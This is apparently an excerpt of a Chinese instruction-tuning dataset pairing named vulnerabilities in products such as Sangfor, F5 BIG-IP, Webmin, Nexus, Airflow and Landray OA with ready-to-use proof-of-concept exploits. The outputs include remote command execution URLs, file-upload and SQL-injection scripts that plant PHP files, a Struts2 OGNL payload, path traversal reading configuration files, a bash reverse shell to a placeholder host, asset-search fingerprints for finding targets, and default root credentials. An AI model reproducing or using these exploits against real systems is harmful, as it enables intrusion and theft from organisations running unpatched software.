  863. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 日志中心 c.php 远程命令执行漏洞\n漏洞描述:深信服 日志中心 c.php  远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行\n影响版本:``` 深信服 日志中心 ```\n网络测绘:``` body=\"isHighPerformance : !!SFIsHighPerformance,\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"isHighPerformance : !!SFIsHighPerformance,\"\n2. /tool/log/c.php?strip_slashes=system&host=ipconfig\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 日志中心 c.php 远程命令执行漏洞.md"}
    864. 

  864. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:和信创天云桌面系统 远程命令执行 RCE漏洞\n影响版本:``` 和信创天云桌面系统 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. POST /Upload/upload_file.php?l=1 HTTP/1.1\nHost: xxx.xxx.xx.xxx\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\nAccept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,fil;q=0.8\nCookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv\nContent-Length: 182\n\n------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php\"\nContent-Type: image/avif\n\n<?php phpinfo(); ?>\n------WebKitFormBoundaryfcKRltGv--\n2. http://xxx.xx.xxx.xxx/Upload/1/test.php\n3. import requests\nimport sys\nimport random\nimport base64\nimport re\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mVersion: 和信云桌面任意文件上传漏洞                                       \\033[0m')\n    print('+  \\033[36m使用格式:  python3 poc.py                                            \\033[0m')\n    print('+  \\033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \\033[0m')\n    print('+  \\033[36mCmd         >>> whoami                                            \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"/Upload/upload_file.php?l=test\"\n    headers = {\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\",\n            \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv\"\n    }\n    data = base64.b64decode(\"Q29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZmNLUmx0R3YKCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWZjS1JsdEd2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJ0ZXN0LnBocCIKQ29udGVudC1UeXBlOiBpbWFnZS9hdmlmCgo8P3BocCBwaHBpbmZvKCk7Pz4KLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZmNLUmx0R3YtLQ==\")\n    try:\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)\n        if \"Requst\" in response.text and response.status_code == 200:\n            webshell_url = target_url + \"/Upload/test/config.php\"\n            response = requests.get(url=webshell_url, headers=headers,verify=False, timeout=5)\n            if \"shell\" in response.text and response.status_code == 200:\n                print(\"\\033[32m[o] 目标 {}存在漏洞 config.php\\n[o] 路径为 {}/Upload/test/config.php\\033[0m\".format(target_url, target_url))\n            else:\n                print(\"\\033[31m[x] 请求失败 \\033[0m\")\n                sys.exit(0)\n        else:\n            print(\"\\033[31m[x] 上传失败 \\033[0m\")\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败 \\033[0m\", e)\n\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/和信创天云桌面系统 远程命令执行 RCE漏洞.md"}
    865. 

  865. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞\n漏洞描述:飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件\n影响版本:飞企互联 FE业务协作平台\n网络测绘:``` \"flyrise.stopBackspace.js\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"flyrise.stopBackspace.js\"\n2. /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞.md"}
    866. 

  866. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Airflow 示例DAG中的命令注入 CVE-2020-11978\n漏洞描述:Apache Airflow是一款开源的分布式任务调度框架,通过DAG(Directed acyclic graph 有向无环图)来管理任务流程的任务调度工具,不需要知道业务数据的具体内容,设置任务的依赖关系即可实现任务调度。 在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。 由于启动的组件比较多,可能会有点卡,运行此环境可能需要准备2G以上的内存。 参考链接: - https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx - https://github.com/pberba/CVE-2020-11978\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-11978\n【POC利用方法】\n1. #初始化数据库\ndocker-compose run airflow-init\n\n#启动服务\ndocker-compose up -d\n2. docker-compose exec airflow-worker ls -l /tmp\n3. {\"message\":\"'\\\";bash -i >& /dev/tcp/your-vps-ip/9999 0>&1;#\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Apache Airflow 示例DAG中的命令注入 CVE-2020-11978.md"}
    867. 

  867. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Afterlogic Aurora & WebMail Pro 任意文件读取CVE-2021-26294\n漏洞描述:攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。 参考链接: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294 - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md - https://forum.ywhack.com/thread-115326-1-8.html\n影响版本:``` WebMail Pro ≤ 7.7.9 Afterlogic Aurora ≤ 7.7.9 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-26294\n【POC利用方法】\n1. WebMail Pro ≤ 7.7.9\nAfterlogic Aurora ≤ 7.7.9\n2. curl -u 'caldav_public_user@localhost:caldav_public_user' \"https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml\"\n3. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Afterlogic Aurora & WebMail Pro 任意文件读取 CVE-2021-26294.md"}
    868. 

  868. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nexus Repository Manager 3 extdirect 远程命令执行漏洞 CVE-2020-10204\n漏洞描述:Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。 参考链接: - https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 - https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10204/README.md\n影响版本:``` Nexus < 3.21.1 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-10204\n【POC利用方法】\n1. Nexus < 3.21.1\n2. docker-compose up -d\n3. POST /service/extdirect HTTP/1.1\nHost: your-vps-ip:8081\nContent-Length: 223\nX-Requested-With: XMLHttpRequest\nX-Nexus-UI: true\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\nNX-ANTI-CSRF-TOKEN: 0.9514072635504696\nContent-Type: application/json\nAccept: */*\nOrigin: http://your-vps-ip:8081\nReferer: http://your-vps-ip:8081/\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: NX-ANTI-CSRF-TOKEN=0.9514072635504696; NXSESSIONID=9c8acd44-38cb-4a2c-a045-96161193dbc2\n\n{\"action\":\"coreui_User\",\"method\":\"update\",\"data\":[{\"userId\":\"admin\",\"version\":\"2\",\"firstName\":\"admin\",\"lastName\":\"User\",\"email\":\"admin@example.org\",\"status\":\"active\",\"roles\":[\"nxadmin$\\\\B{233*233}\"]}],\"type\":\"rpc\",\"tid\":11}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Nexus Repository Manager 3 extdirect 远程命令执行漏洞 CVE-2020-10204.md"}
    869. 

  869. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388\n漏洞描述:BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。\n影响版本:``` 11.6.1-16.1.2 ```\n网络测绘:``` icon_hash=\"-335242539\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-1388\n【POC利用方法】\n1. 11.6.1-16.1.2\n2. icon_hash=\"-335242539\"\n3. POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nAuthorization: Basic YWRtaW46\nX-F5-Auth-Token: a\nConnection: close, X-F5-Auth-Token\nContent-Length: 39\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md"}
    870. 

  870. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞\n漏洞描述:瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过 WEB 即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。未经身份认证的远程攻击者可以利用系统中存在的 SQL 注入漏洞,写入后门文件,从而执行远程代码。\n影响版本:``` 5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.3.1 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.3.1\n2. import requests\nimport sys\n\nurl = sys.argv[1]\npayload=\"/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C1.php%22+--+-&cmd=UserLogin\"\nrepose = requests.get(url=url+payload)\nif repose.status_code ==200:\n    a = url + '1.php'\n    b = requests.get(url=a)\n    if b.status_code == 200:\n        print('[+] 漏洞存在,验证地址: {}1.php '.format(url))\n3. GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C2.php%22+--+-&cmd=UserLogin HTTP/1.1\nHost: xx.xx.xx.xx\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: CookieLanguageName=ZH-CN; CookieAuthType=0\nUpgrade-Insecure-Requests: 1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞.md"}
    871. 

  871. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 行为感知系统 c.php 远程命令执行漏洞\n漏洞描述:深信服 行为感知系统  c.php  远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行\n影响版本:``` 深信服 行为感知系统 ```\n网络测绘:``` body=\"isHighPerformance : !!SFIsHighPerformance,\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"isHighPerformance : !!SFIsHighPerformance,\"\n2. /tool/log/c.php?strip_slashes=system&host=ipconfig\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 行为感知系统 c.php 远程命令执行漏洞.md"}
    872. 

  872. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543\n漏洞描述:MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码\n影响版本:``` MessageSolution 企业邮件归档管理系统EEA ```\n网络测绘:``` title=\"MessageSolution Enterprise Email Archiving (EEA)\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. MessageSolution 企业邮件归档管理系统EEA\n2. title=\"MessageSolution Enterprise Email Archiving (EEA)\"\n3. http://xxx.xxx.xxx.xxx/authenticationserverservlet/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.md"}
    873. 

  873. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Webmin password_change.cgi 远程命令执行漏洞 CVE-2019-15107\n漏洞描述:Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页。面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。\n影响版本:``` Webmin <= 1.920 ```\n网络测绘:``` app=\"webmin\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-15107\n【POC利用方法】\n1. Webmin <= 1.920\n2. app=\"webmin\"\n3. if ($wuser) {\n\t# Update Webmin user's password\n\t$enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});\n\t$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);\n\t$perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});\n\t$perr && &pass_error(&text('password_enewpass', $perr));\n\t$wuser->{'pass'} = &acl::encrypt_password($in{'new1'});\n\t$wuser->{'temppass'} = 0;\n\t&acl::modify_user($wuser->{'name'}, $wuser);\n\t&reload_miniserv();\n\t}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Webmin password_change.cgi 远程命令执行漏洞 CVE-2019-15107.md"}
    874. 

  874. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞\n漏洞描述:H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞 与齐治堡垒机出现的漏洞相似\n影响版本:``` H3C SecParh堡垒机 ```\n网络测绘:``` app=\"H3C-SecPath-运维审计系统\" && body=\"2018\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. H3C SecParh堡垒机\n2. app=\"H3C-SecPath-运维审计系统\" && body=\"2018\"\n3. /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞.md"}
    875. 

  875. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:飞视美 视频会议系统 Struts2 远程命令执行漏洞\n漏洞描述:飞视美 视频会议系统 Struts2组件存在远程命令执行漏洞,通过漏洞攻击者可执行任意命令获取服务器权限\n影响版本:``` 飞视美 视频会议系统 ```\n网络测绘:``` app=\"飞视美-视频会议系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"飞视美-视频会议系统\"\n2. /confinfoaction!showallConfinfos.action\n3. POST /confinfoaction!showallConfinfos.action HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 669\nHost: \nConnection: Keep-Alive\n\n('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43mycmd\\75\\'ipconfig\\'')(d))&(h)(('\\43myret\\75@java.lang.Runtime@getRuntime().exec(\\43mycmd)')(d))&(i)(('\\43mydat\\75new\\40java.io.DataInputStream(\\43myret.getInputStream())')(d))&(j)(('\\43myres\\75new\\40byte[51020]')(d))&(k)(('\\43mydat.readFully(\\43myres)')(d))&(l)(('\\43mystr\\75new\\40java.lang.String(\\43myres)')(d))&(m)(('\\43myout\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\\43myout.getWriter().println(\\43mystr)')(d))\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/飞视美 视频会议系统 Struts2 远程命令执行漏洞.md"}
    876. 

  876. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Crawlab file 任意文件读取漏洞\n漏洞描述:Crawlab 后台 /api/file接口 存在任意文件读取漏洞,攻击者通过漏洞就可以读取服务器中的任意文件\n影响版本:``` Crawlab v0.0.1 ```\n网络测绘:``` title=\"Crawlab\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Crawlab v0.0.1\n2. title=\"Crawlab\"\n3. package routes\n\nimport (\n\t\"crawlab/utils\"\n\t\"github.com/gin-gonic/gin\"\n\t\"io/ioutil\"\n\t\"net/http\"\n)\n\n// @Summary Get file\n// @Description Get file\n// @Tags file\n// @Produce json\n// @Param Authorization header string true \"Authorization token\"\n// @Success 200 json string Response\n// @Failure 400 json string Response\n// @Router /file [get]\nfunc GetFile(c *gin.Context) {\n\tpath := c.Query(\"path\")\n\tfileBytes, err := ioutil.ReadFile(path)\n\tif err != nil {\n\t\tHandleError(http.StatusInternalServerError, c, err)\n\t}\n\tc.JSON(http.StatusOK, Response{\n\t\tStatus:  \"ok\",\n\t\tMessage: \"success\",\n\t\tData:    utils.BytesToString(fileBytes),\n\t})\n}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Crawlab file 任意文件读取漏洞.md"}
    877. 

  877. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:会捷通云视讯 登录绕过漏洞\n漏洞描述:会捷通云视讯存在登陆绕过漏洞,通过拦截特定的请求包并修改即可获取后台权限\n影响版本:``` 会捷通云视讯 ```\n网络测绘:``` body=\"/him/api/rest/v1.0/node/role\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"/him/api/rest/v1.0/node/role\"\n2. HTTP/1.1 200 \nServer: Hsengine/1.4.1\nDate: Mon, 17 May 2021 16:13:43 GMT\nContent-Type: application/json;charset=UTF-8\nConnection: close\nX-Frame-Options: SAMEORIGIN\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nAccept-Ranges: bytes\nVary: Accept-Charset, Accept-Encoding, Accept-Language, Accept\nContent-Length: 61\n\n{\"token\":null,\"result\":null}\n3. HTTP/1.1 200\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/会捷通云视讯 登录绕过漏洞.md"}
    878. 

  878. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642\n漏洞描述:Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。\n影响版本:``` Webmin < 1.920 ```\n网络测绘:``` app=\"webmin\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-15642\n【POC利用方法】\n1. Webmin < 1.920\n2. app=\"webmin\"\n3. POST /rpc.cgi \nReferer: https://xxx.xxx.xxx.xxx/sysinfo.cgi?xnavigation=1\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd=`id`;print \"$cmd\\n\\n\";\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642.md"}
    879. 

  879. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞\n漏洞描述:用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件\n影响版本:``` 用友 畅捷通T+ ```\n网络测绘:``` app=\"畅捷通-TPlus\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"畅捷通-TPlus\"\n2. /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞.md"}
    880. 

  880. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Cacti SQL 注入漏洞 CVE-2020-14295\n漏洞描述:Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞,允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询,所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。 参考链接: - https://github.com/Cacti/cacti/issues/3622\n影响版本:``` Cacti < 1.2.13 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-14295\n【POC利用方法】\n1. Cacti < 1.2.13\n2. /cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+-\n3. - https://github.com/Cacti/cacti/issues/3622\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Cacti SQL 注入漏洞 CVE-2020-14295.md"}
    881. 

  881. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490\n漏洞描述:Jellyfin RemoteImageController.cs 文件中存在SSRF漏洞,通过构造特殊的请求,探测内网信息\n影响版本:``` Jellyfin < 10.7.2 ```\n网络测绘:``` app=\"Jellyfin\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-29490\n【POC利用方法】\n1. Jellyfin < 10.7.2\n2. app=\"Jellyfin\"\n3. function getDisplayUrl(url, apiClient) {\n        return apiClient.getUrl('Images/Remote', { imageUrl: url });\n    }\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Jellyfin RemoteImageController.cs SSRF漏洞 CVE-2021-29490.md"}
    882. 

  882. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞\n漏洞描述:信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 对应的ping功能存在后台命令执行漏洞,通过默认口令可以获取系统权限\n影响版本:``` 信诺瑞得 WiseGrid慧敏应用交付网关 ```\n网络测绘:``` app=\"WiseGrid慧敏应用交付网关\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 信诺瑞得 WiseGrid慧敏应用交付网关\n2. app=\"WiseGrid慧敏应用交付网关\"\n3. ssh:root/sinogrid\nweb: admin/sinogrid\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞.md"}
    883. 

  883. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Grafana管理后台SSRF\n漏洞描述:Grafana是一个开源的度量分析与可视化套件。在其管理后台中存在一个功能,攻击者可以用于向任意地址发送HTTP请求,且支持自定义HTTP Header。 参考链接: - https://github.com/RandomRobbieBF/grafana-ssrf\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. [auth.anonymous]\nenabled = true\norg_role = Admin\n3. python grafana-ssrf.py -H http://your-ip:3000 -u http://example.com/attack\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Grafana管理后台SSRF.md"}
    884. 

  884. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 ERP-NC NCFindWeb 目录遍历漏洞\n漏洞描述:用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息\n影响版本:``` 用友ERP-NC ```\n网络测绘:``` app=\"用友-UFIDA-NC\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"用友-UFIDA-NC\"\n2. /NCFindWeb?service=IPreAlertConfigService&filename=\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 ERP-NC NCFindWeb 目录遍历漏洞.md"}
    885. 

  885. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:蓝凌OA admin.do JNDI远程命令执行\n漏洞描述:深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限\n影响版本:``` 蓝凌OA ```\n网络测绘:``` app=\"Landray-OA系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Landray-OA系统\"\n2. /WEB-INF/KmssConfig/admin.properties\n3. POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 60\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nvar={\"body\":{\"file\":\"/WEB-INF/KmssConfig/admin.properties\"}}\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/蓝凌OA admin.do JNDI远程命令执行.md"}
    886. 

